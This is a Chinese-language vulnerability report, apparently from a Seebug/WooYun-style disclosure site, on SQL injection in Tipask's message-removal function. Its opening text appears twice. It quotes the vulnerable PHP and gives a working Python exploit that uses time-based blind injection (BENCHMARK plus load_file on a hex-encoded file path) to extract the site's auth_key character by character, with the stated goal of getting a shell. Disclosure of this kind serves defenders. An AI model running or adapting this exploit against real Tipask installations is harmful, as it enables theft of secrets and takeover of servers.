### 简要描述: 审核真给力,刚提交就通过了 ,赞啊!!!! ### 详细说明: 部分案例: [<img src="https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg) 经分析下列文件存在注入 /control/message.php 代码如下 ``` function onremovedialog() { if($this->post['message_author']){ $authors = $this->post['message_author']; $_ENV['message']->remove_by_author($authors); $this->message("对话删除成功!", get_url_source()); } } ``` 跟进remove_by_author函数 ``` function remove_by_author($authors) { foreach ($authors as $fromuid) { $this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid<>touid AND ((fromuid=$fromuid AND touid=" . $this->base->user['uid'] . ") AND status=1)"); $this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid<>touid AND ((fromuid=" . $this->base->user['uid'] . " AND touid=" . $fromuid . ") AND status=2"); $this->db->query("UPDATE " ....
### 简要描述: 审核真给力,刚提交就通过了 ,赞啊!!!! ### 详细说明: 部分案例: [<img src="https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg) 经分析下列文件存在注入 /control/message.php 代码如下 ``` function onremovedialog() { if($this->post['message_author']){ $authors = $this->post['message_author']; $_ENV['message']->remove_by_author($authors); $this->message("对话删除成功!", get_url_source()); } } ``` 跟进remove_by_author函数 ``` function remove_by_author($authors) { foreach ($authors as $fromuid) { $this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid<>touid AND ((fromuid=$fromuid AND touid=" . $this->base->user['uid'] . ") AND status=1)"); $this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid<>touid AND ((fromuid=" . $this->base->user['uid'] . " AND touid=" . $fromuid . ") AND status=2"); $this->db->query("UPDATE " . DB_TABLEPRE . "message SET status=2 WHERE fromuid<>touid AND ((fromuid=$fromuid AND touid=" . $this->base->user['uid'] . ") AND status IN (0,1))"); $this->db->query("UPDATE " . DB_TABLEPRE . "message SET status=1 WHERE fromuid<>touid AND ((fromuid=" . $this->base->user['uid'] . " AND touid=" . $fromuid . ") AND status IN (0,2))"); } } ``` 可以看出,这里存在多处注入 为了无限制getshell,依然还是获取加密的auth_key Exp,直接参照上一个漏洞改改就可以用: ``` import urllib import urllib2 from time import * def inject(url,payload): post = urllib.urlencode({ 'message_author[]':payload }) header = {'Cookie':'tp_auth=70349FVn7tDasEWTHDyi6y7itpKIFhjiQ66UaK7mwIB31Rc7E0MttS8v7QfbBy1yGmiHDNptr3sjTC7RyXhM'} req = urllib2.Request(url,post,header) start_time = time() resp = urllib2.urlopen(req) flag = int(time()-start_time) return flag def exploit(): result = "" url = 'http://127.0.0.1/tipask/?message/removedialog.html' for i in range(4677,4741): for num in range(32,127): flag= inject(url,"6 AND touid=2)) and if(ord(substring((select/**/load_file(0x443A5C417070536572765C7777775C74697061736B5C646174615C63616368655C73657474696E672E706870)),%s,1))=%s,BENCHMARK(5000000,md5(1)),null)#"%(i,num)) if flag>0: mstr = i - 4676 result = result+chr(num) print 'auth_key =>'+result break if __name__=="__main__": exploit() ``` 运行,如图所示: [<img src="https://images.seebug.org/upload/201412/131756142e4d84cf8aaecea942096c77f75cedd9.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131756142e4d84cf8aaecea942096c77f75cedd9.jpg) ### 漏洞证明: 运行,如图所示: [<img src="https://images.seebug.org/upload/201412/131756142e4d84cf8aaecea942096c77f75cedd9.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131756142e4d84cf8aaecea942096c77f75cedd9.jpg)
